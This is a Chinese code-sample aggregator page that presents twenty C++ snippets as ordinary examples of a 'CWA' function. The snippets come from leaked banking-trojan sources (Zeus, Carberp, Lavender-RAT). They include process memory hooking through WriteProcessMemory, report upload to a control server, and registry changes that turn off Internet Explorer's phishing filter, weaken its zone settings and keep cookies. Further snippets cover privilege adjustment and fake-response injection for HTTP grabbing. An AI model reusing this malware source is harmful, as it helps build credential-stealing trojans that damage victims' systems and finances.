本文整理汇总了C++中CWA函数的典型用法代码示例。如果您正苦于以下问题:C++ CWA函数的具体用法?C++ CWA怎么用?C++ CWA使用的例子?那么恭喜您, 这里精选的函数代码示例或许可以为您提供帮助。
在下文中一共展示了CWA函数的20个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于我们的系统推荐出更棒的C++代码示例。
示例1: checkAvalibleBytes
bool WaHook::_unhook(HANDLE process, void *hookedFunction, void *originalFunction, DWORD size)
{
bool ret = false;
DWORD oldProtect;
DWORD_PTR avalibeBytes = checkAvalibleBytes(process, hookedFunction);
//Даем все права затрагиваемым страницам.
if(avalibeBytes >= OPCODE_MAX_SIZE * 2 && CWA(kernel32, VirtualProtectEx)(process, hookedFunction, OPCODE_MAX_SIZE * 2, PAGE_EXECUTE_READWRITE, &oldProtect) != 0)
{
if(CWA(kernel32, WriteProcessMemory)(process, hookedFunction, originalFunction, size - JMP_ADDR_SIZE, NULL) != 0)ret = true;
//Восстаналиваем права.
CWA(kernel32, VirtualProtectEx)(process, hookedFunction, OPCODE_MAX_SIZE * 2, oldProtect, &oldProtect);
}
return ret;
}
开发者ID:AlexWMF,项目名称:Carberp,代码行数:17,代码来源:wahook.cpp
示例2: max
/*В В Search for a file to upload.
В В OUT fileName - the full path of the file.
В В IN tempFile - the full path of the temporary file.
В В IN maxDelay - max delay time for the report max (errorDelay, normalDelay).
В В Return - true - the file is found,
В В В В В В В В В В В В В В В В В false - file not found.*/
static bool findReportFileForSending(LPWSTR fileName, LPWSTR tempFile, DWORD maxDelay)
{
//Check is not sent out a temporary file.
if(CWA(kernel32, GetFileAttributesW)(tempFile) != INVALID_FILE_ATTRIBUTES)
{
Str::_CopyW(fileName, tempFile, -1);
return true;
}
//Check the log file.
if(CWA(kernel32, GetFileAttributesW)(reportFile) != INVALID_FILE_ATTRIBUTES)
{
Str::_CopyW(fileName, reportFile, -1);
return true;
}
return false;
}
开发者ID:CaineQT,项目名称:malware_sources,代码行数:25,代码来源:report.cpp
示例3: CWA
LPSTR Wininet::_queryInfoExA(HINTERNET request, DWORD infoLevel, LPDWORD lenght, LPDWORD index)
{
char tmpBuf[1];
LPSTR buf;
*lenght = 0;
if((infoLevel & HTTP_QUERY_FLAG_NUMBER) == 0 &&
CWA(wininet, HttpQueryInfoA)(request, infoLevel, tmpBuf, lenght, index) == FALSE && CWA(kernel32, GetLastError)() == ERROR_INSUFFICIENT_BUFFER)
{
if((buf = (LPSTR)Mem::alloc(*lenght)) != NULL)
{
if(CWA(wininet, HttpQueryInfoA)(request, infoLevel, buf, lenght, index) == TRUE)return buf;
Mem::free(buf);
}
}
return NULL;
}
开发者ID:CaineQT,项目名称:malware_sources,代码行数:17,代码来源:wininet.cpp
示例4: max
/*
Поиск файл для загрузки на сервер.
OUT fileName - полный путь файла.
IN tempFile - полный путь временного файла.
IN maxDelay - макс время задержки для отчета max(errorDelay, normalDelay).
Return - true - файл найден,
false - файл не найден.
*/
static bool findReportFileForSending(LPWSTR fileName, LPWSTR tempFile, DWORD maxDelay)
{
//Проверяем не отосланный временный файл.
if(CWA(kernel32, GetFileAttributesW)(tempFile) != INVALID_FILE_ATTRIBUTES)
{
Str::_CopyW(fileName, tempFile, -1);
return true;
}
//Проверяем файл отчета.
if(CWA(kernel32, GetFileAttributesW)(reportFile) != INVALID_FILE_ATTRIBUTES)
{
Str::_CopyW(fileName, reportFile, -1);
return true;
}
return false;
}
开发者ID:3L173-CNW,项目名称:Zeus,代码行数:27,代码来源:report.cpp
示例5: _GenerateRandomNameW
//fs
bool MalwareTools::_GenerateRandomFileName(DWORD dwCaseFlags, LPWSTR pstrPath, LPWSTR pstrName, LPWSTR pstrExtension, BYTE bMinChars, BYTE bMaxChars)
{
WCHAR tmpName[MAX_PATH];
for(DWORD i = 0; i < 100; i++)
{
_GenerateRandomNameW(dwCaseFlags, tmpName, bMinChars, bMaxChars);
if(Fs::_pathCombine(pstrName, pstrPath, tmpName))
{
if(pstrExtension != NULL && CWA(shlwapi, PathAddExtensionW)(pstrName, pstrExtension) == FALSE)continue;
if(CWA(kernel32, GetFileAttributesW)(pstrName) == INVALID_FILE_ATTRIBUTES)return true;
}
}
return false;
}
开发者ID:chocolatkey,项目名称:Lavender-RAT,代码行数:18,代码来源:malwaretools.cpp
示例6: CWA
void WininetHook::init(const LPWSTR homePage)
{
connections = NULL;
connectionsCount = 0;
CWA(kernel32, InitializeCriticalSection)(&connectionsCs);
if(coreData.integrityLevel > Process::INTEGRITY_LOW)
{
//Домашняя страница.
if(homePage != NULL && *homePage != 0)
{
CSTR_GETW(startPageValue, regvalue_ie_startpage);
CSTR_GETW(startPagePath, regpath_ie_startpage);
Registry::_setValueAsString(HKEY_CURRENT_USER, startPagePath, startPageValue, homePage, Str::_LengthW(homePage));
}
//Отключение фишинг фильтра.
{
CSTR_GETW(key, regpath_ie_phishingfilter);
CSTR_GETW(var1, regvalue_ie_phishingfilter1);
CSTR_GETW(var2, regvalue_ie_phishingfilter2);
const LPWSTR vars[] = {var1, var2};
for(BYTE i = 0; i < sizeof(vars) / sizeof(LPWSTR); i++)if(Registry::_getValueAsDword(HKEY_CURRENT_USER, key, vars[i]) != 0)Registry::_setValueAsDword(HKEY_CURRENT_USER, key, vars[i], 0);
}
//Не очищать куки при выходе из IE.
{
CSTR_GETW(key, regpath_ie_privacy);
CSTR_GETW(var, regvalue_ie_privacy_cookies);
if(!Registry::_valueExists(HKEY_CURRENT_USER, key, var) || Registry::_getValueAsDword(HKEY_CURRENT_USER, key, var) != 0)
{
Registry::_setValueAsDword(HKEY_CURRENT_USER, key, var, 0);
}
}
//Настройка Интернет-зон.
//FIXME: делать это через COM.
{
CSTR_GETW(key, regpath_ie_zones);
CSTR_GETW(var1, regpath_ie_zones_1406);
CSTR_GETW(var2, regpath_ie_zones_1609);
const LPWSTR vars[] = {var1, var2};
WCHAR keyBuf[CryptedStrings::len_regpath_ie_zones + 10];
for(BYTE i = 0; i < 5; i++)if(Str::_sprintfW(keyBuf, sizeof(keyBuf) / sizeof(WCHAR), key, i) > 0)
{
for(BYTE a = 0; a < sizeof(vars) / sizeof(LPWSTR); a++)
{
if(Registry::_getValueAsDword(HKEY_CURRENT_USER, keyBuf, vars[a]) != 0)Registry::_setValueAsDword(HKEY_CURRENT_USER, keyBuf, vars[a], 0);
}
}
}
}
}
开发者ID:3L173-CNW,项目名称:Zeus,代码行数:58,代码来源:wininethook.cpp
示例7: CWA
bool Process::_enablePrivilege(LPWSTR privilegeName, bool enable)
{
HANDLE token;
if(CWA(advapi32, OpenThreadToken)(CWA(kernel32, GetCurrentThread)(), TOKEN_ADJUST_PRIVILEGES/*B | TOKEN_QUERY*/, FALSE, &token) == FALSE)
{
if(CWA(advapi32, OpenProcessToken)(CURRENT_PROCESS, TOKEN_ADJUST_PRIVILEGES/*B | TOKEN_QUERY*/, &token) == FALSE)
{
return false;
}
}
bool r = false;
TOKEN_PRIVILEGES tp;
tp.PrivilegeCount = 1;
tp.Privileges[0].Attributes = enable ? SE_PRIVILEGE_ENABLED : 0;
if(CWA(advapi32, LookupPrivilegeValueW)(NULL, privilegeName, &tp.Privileges[0].Luid) != FALSE &&
CWA(advapi32, AdjustTokenPrivileges)(token, FALSE, &tp, 0, NULL, NULL) != FALSE &&
CWA(kernel32, GetLastError)() == ERROR_SUCCESS)
{
r = true;
}
CWA(kernel32, CloseHandle)(token);
return r;
}
开发者ID:fffonion,项目名称:malware_sources,代码行数:29,代码来源:process.cpp
示例8: CWA
//to hz
bool MalwareTools::_getOsGuid(GUID *guid)
{
bool ok = false;
WCHAR path[MAX_PATH];
WCHAR volume[100];
if(CWA(shell32, SHGetFolderPathW)(NULL, CSIDL_WINDOWS, NULL, SHGFP_TYPE_CURRENT, path) == S_OK)
{
//Ищим первую точку монтирования.
CWA(shlwapi, PathAddBackslashW)(path);
while(CWA(kernel32, GetVolumeNameForVolumeMountPointW)(path, volume, sizeof(volume) / sizeof(WCHAR)) == FALSE)
{
CWA(shlwapi, PathRemoveBackslashW)(path);
if(CWA(shlwapi, PathRemoveFileSpecW)(path) == FALSE)goto BAD_END;
CWA(shlwapi, PathAddBackslashW)(path);
}
//Потверждаем GUID.
LPWSTR str = volume + 10;
if(*str == '{')
{
str[38] = 0;
if(CWA(ole32, CLSIDFromString)(str, guid) == NOERROR)ok = true;
}
}
BAD_END:
if(!ok)Mem::_zero(guid, sizeof(GUID));
return ok;
}
开发者ID:chocolatkey,项目名称:Lavender-RAT,代码行数:31,代码来源:malwaretools.cpp
示例9: CWA
bool WinSecurity::_setLowIntegrityLevelLabel(LPWSTR name, DWORD objectType, bool inherit)
{
bool r = false;
PSECURITY_DESCRIPTOR sd;
Process::_enablePrivilege(SE_SECURITY_NAME, true);
if(CWA(advapi32, ConvertStringSecurityDescriptorToSecurityDescriptorW)(inherit ? LOWINTEGRITYLEVEL_FULLACCESS_INHERIT : LOWINTEGRITYLEVEL_FULLACCESS, SDDL_REVISION_1, &sd, NULL) != FALSE)
{
BOOL saclPresent, saclDefaulted;
PACL sacl = NULL;
if(CWA(advapi32, GetSecurityDescriptorSacl)(sd, &saclPresent, &sacl, &saclDefaulted) != FALSE)
{
if(CWA(advapi32, SetNamedSecurityInfoW)(name, (SE_OBJECT_TYPE)objectType, LABEL_SECURITY_INFORMATION, NULL, NULL, NULL, sacl) == ERROR_SUCCESS)r = true;
}
CWA(kernel32, LocalFree)(sd);
}
return r;
}
开发者ID:chocolatkey,项目名称:Lavender-RAT,代码行数:18,代码来源:winsecurity.cpp
示例10: BOOL
bool Process::_isWow64(HANDLE process)
{
typedef BOOL (WINAPI *ISWOW64PROCESS)(HANDLE, PBOOL);
BOOL isWow64 = FALSE;
HMODULE kernel32 = CWA(kernel32, GetModuleHandleW)(L"kernel32.dll");
if(kernel32 != NULL)
{
ISWOW64PROCESS isWow64Process = (ISWOW64PROCESS)CWA(kernel32, GetProcAddress)(kernel32, "IsWow64Process");
if(isWow64Process != NULL)
{
if(isWow64Process(process, &isWow64) == FALSE)return false;
}
}
return isWow64 ? true : false;
}
开发者ID:fffonion,项目名称:malware_sources,代码行数:18,代码来源:process.cpp
示例11: CWA
DWORD Console::writeStringW(LPWSTR string, DWORD size)
{
if(size == (DWORD)-1)size = Str::_LengthW(string);
if(isWineBug)return writeData(string, size * sizeof(WCHAR)); //WINE WARNING: Вывод почему-то происходит абсолютно номарльно.
register DWORD result;
CWA(kernel32, WriteConsoleW)(handleOutput, string, size, &result, NULL);
return result;
}
开发者ID:3L173-CNW,项目名称:Zeus,代码行数:9,代码来源:console.cpp
示例12: CWA
LPWSTR Gui::_getWindowText(HWND window, LPDWORD size)
{
LPWSTR buf = NULL;
int len = CWA(user32, GetWindowTextLengthW)(window);
if(len > 0 && (buf = (LPWSTR)Mem::alloc(len * sizeof(WCHAR) + sizeof(WCHAR))) != NULL)
{
if((len = CWA(user32, GetWindowTextW)(window, buf, len + 1)) > 0)
{
if(size)*size = len;
}
else
{
Mem::free(buf);
buf = NULL;
}
}
return buf;
}
开发者ID:chocolatkey,项目名称:Lavender-RAT,代码行数:18,代码来源:gui.cpp
示例13: sizeof
void OsEnv::_getVersionEx(OSINFO *oi)
{
Mem::_zero(oi, sizeof(OSINFO));
OSVERSIONINFOEXW osvi;
osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEXW);
if(CWA(kernel32, GetVersionExW)((OSVERSIONINFOW *)&osvi) != FALSE)
{
SYSTEM_INFO si;
CWA(kernel32, GetNativeSystemInfo)(&si);
oi->version = _getVersion();
oi->sp = (osvi.wServicePackMajor > 0xFF || osvi.wServicePackMinor != 0) ? 0 : LOBYTE(osvi.wServicePackMajor);
oi->build = osvi.dwBuildNumber > 0xFFFF ? 0 : LOWORD(osvi.dwBuildNumber);
oi->architecture = si.wProcessorArchitecture;
}
}
开发者ID:3L173-CNW,项目名称:Zeus,代码行数:18,代码来源:osenv.cpp
示例14: CWA
DWORD Console::writeStringW(LPWSTR string, DWORD size)
{
if(size == (DWORD)-1)size = Str::_LengthW(string);
if(isWineBug)return writeData(string, size * sizeof(WCHAR)); //WINE WARNING: The output for some reason, there is absolutely nomarlno.
register DWORD result;
CWA(kernel32, WriteConsoleW)(handleOutput, string, size, &result, NULL);
return result;
}
开发者ID:imstillrow,项目名称:trojancore,代码行数:9,代码来源:console.cpp
示例15: CSTR_GETW
bool OsEnv::_getUserProfileDirectoryhBySid(PSID sid, LPWSTR buffer)
{
bool retVal = false;
LPWSTR sidStr;
if(CWA(kernel32, ConvertSidToStringSidW)(sid, &sidStr) != FALSE)
{
CSTR_GETW(regPathFormat, regpath_profilelist);
WCHAR regPath[MAX_PATH];
if(Str::_sprintfW(regPath, MAX_PATH, regPathFormat, sidStr) > 0)
{
CSTR_GETW(regValuePath, regvalue_profilelist_path);
DWORD r = Registry::_getValueAsString(HKEY_LOCAL_MACHINE, regPath, regValuePath, regPath, MAX_PATH);
if(r != 0 && r != (DWORD)-1)retVal = Fs::_unquoteAndExpandPath(regPath, buffer);
}
CWA(kernel32, LocalFree)(sidStr);
}
return retVal;
}
开发者ID:3L173-CNW,项目名称:Zeus,代码行数:18,代码来源:osenv.cpp
示例16: sizeof
bool Gui::_loadCommonControl(DWORD classes)
{
INITCOMMONCONTROLSEX cc;
cc.dwSize = sizeof(INITCOMMONCONTROLSEX);
cc.dwICC = classes;
return (CWA(comctl32, InitCommonControlsEx)(&cc) == TRUE);
}
开发者ID:chocolatkey,项目名称:Lavender-RAT,代码行数:9,代码来源:gui.cpp
示例17: __FxIRead
static UINT __FxIRead(INT_PTR hf, void *memory, UINT cb)
{
DWORD r;
if(hf != -1 && hf != 0)
{
if(memory != NULL && CWA(kernel32, ReadFile)(((CFDATA *)hf)->handle, memory, cb, &r, NULL))return r;
}
return (UINT)-1;
}
开发者ID:imstillrow,项目名称:trojancore,代码行数:9,代码来源:mscab.cpp
示例18: SWAP_WORD
SOCKET WSocket::tcpConnectA(const LPSTR host, const WORD port)
{
WORD tcpPort = SWAP_WORD(port);
//Получаем данные удаленного сервера.
SOCKADDR_STORAGE *destAddrIpv4 = NULL;
SOCKADDR_STORAGE *destAddrIpv6 = NULL;
{
struct addrinfo *aiList;
if(CWA(ws2_32, getaddrinfo)(host, NULL, NULL, &aiList) != 0)return INVALID_SOCKET;
struct addrinfo *cur = aiList;
while(cur)
{
if(cur->ai_family == AF_INET)destAddrIpv4 = (SOCKADDR_STORAGE *)Mem::copyEx(cur->ai_addr, cur->ai_addrlen);
else if(cur->ai_family == AF_INET6)destAddrIpv6 = (SOCKADDR_STORAGE *)Mem::copyEx(cur->ai_addr, cur->ai_addrlen);
cur = cur->ai_next;
}
CWA(ws2_32, freeaddrinfo)(aiList);
}
SOCKET s = INVALID_SOCKET;
//FIXME: поменять приоретет, когда IPv6 станет порулярнее IPv4.
if(destAddrIpv4 != NULL)
{
((SOCKADDR_IN *)destAddrIpv4)->sin_port = tcpPort;
s = tcpConnect(destAddrIpv4);
}
//Хз на сколько это логично в релаьных условиях.
if(destAddrIpv6 != NULL && s == INVALID_SOCKET)
{
((SOCKADDR_IN6 *)destAddrIpv6)->sin6_port = tcpPort;
s = tcpConnect(destAddrIpv6);
}
Mem::free(destAddrIpv4);
Mem::free(destAddrIpv6);
return s;
}
开发者ID:3L173-CNW,项目名称:Zeus,代码行数:44,代码来源:wsocket.cpp
示例19: WDEBUG1
bool Report::startServerSession(SERVERSESSION *session)
{
WDEBUG1(WDDT_INFO, "url=%S", session->url);
bool retVal = false;
HttpTools::URLDATA ud;
BinStorage::STORAGE *originalPostData = session->postData; //Save the original post-data.
if(HttpTools::_parseUrl(session->url, &ud))
{
Core::initHttpUserAgent();
//Repeat cycle connections to the server in case of disconnection or unavailable.
for(BYTE bi = 0; bi < WININET_CONNECT_RETRY_COUNT && retVal == false; bi++)
{
//Delay.
if(bi > 0)
{
if(session->stopEvent != NULL)
{
if(CWA(kernel32, WaitForSingleObject)(session->stopEvent, WININET_CONNECT_RETRY_DELAY) != WAIT_TIMEOUT)break;
}
else CWA(kernel32, Sleep)(WININET_CONNECT_RETRY_DELAY);
}
//Create a handle to the server.
HINTERNET serverHandle = Wininet::_Connect(coreData.httpUserAgent, ud.host, ud.port, bi % 2 == 0 ? Wininet::WICF_USE_IE_PROXY : 0);
if(serverHandle != NULL)
{
for(DWORD loop = 0;; loop++)
{
int r = sendRequest(&ud, serverHandle, session, originalPostData, loop);
if(r == SSPR_ERROR)break;
else if(r == SSPR_END){retVal = true; break;}
}
Wininet::_CloseConnection(serverHandle);
}
}
HttpTools::_freeUrlData(&ud);
}
session->postData = originalPostData; //Restoring the original post-data.
return retVal;
}
开发者ID:CaineQT,项目名称:malware_sources,代码行数:44,代码来源:report.cpp
示例20: WDEBUG1
HINTERNET HttpGrabber::_createFakeResponse(REQUESTDATA *requestData, INJECTFULLDATA *fakeData)
{
//Генерируем URL фейка.
FAKECONNECT fakeConnect;
fakeConnect.requestData = requestData;
fakeConnect.fakeRequest = NULL;
if(fakeData->flags & HttpInject::FLAG_IS_MIRRORFAKE)fakeConnect.fakeUrl = _genarateMirrorFakeUrlA(fakeData->fakeUrl, requestData->url, fakeData->urlMask);
else fakeConnect.fakeUrl = HttpTools::_catExtraInfoFromUrlToUrlA(requestData->url, fakeData->fakeUrl);
# if defined WDEBUG1
WDEBUG1(WDDT_INFO, "fakeConnect.fakeUrl=[%S].", fakeConnect.fakeUrl);
# endif
//Вызываем поток для прозрачного подключения.
if(fakeConnect.fakeUrl != NULL)
{
Core::initHttpUserAgent(); //Нужно вызвать здесь, т.к. вызов в другом потоке приведет к deadlock.
# if defined WDEBUG0
WDEBUG0(WDDT_INFO, "Sending request to fake.");
# endif
HANDLE fakeThread = CWA(kernel32, CreateThread)(NULL, 0, (LPTHREAD_START_ROUTINE)fakeConnectProc, &fakeConnect, 0, NULL);
if(fakeThread != NULL)
{
Sync::_waitForMultipleObjectsAndDispatchMessages(1, &fakeThread, false, INFINITE);
CWA(kernel32, CloseHandle)(fakeThread);
}
# if defined WDEBUG0
WDEBUG0(WDDT_INFO, "Request sended.");
# endif
Mem::free(fakeConnect.fakeUrl);
}
//Проверяем результат.
# if(BO_DEBUG > 0 && defined WDEBUG)
if(fakeConnect.fakeRequest == NULL)WDEBUG0(WDDT_ERROR, "Failed to create fake request.");
# endif
return fakeConnect.fakeRequest;
}
开发者ID:12019,项目名称:Carberp,代码行数:44,代码来源:httpgrabber.cpp
注:本文中的CWA函数示例整理自Github/MSDocs等源码及文档管理平台,相关代码片段筛选自各路编程大神贡献的开源项目,源码版权归原作者所有,传播和使用请参考对应项目的License;未经允许,请勿转载。 |
客服电话
APP下载
官方微信
请发表评论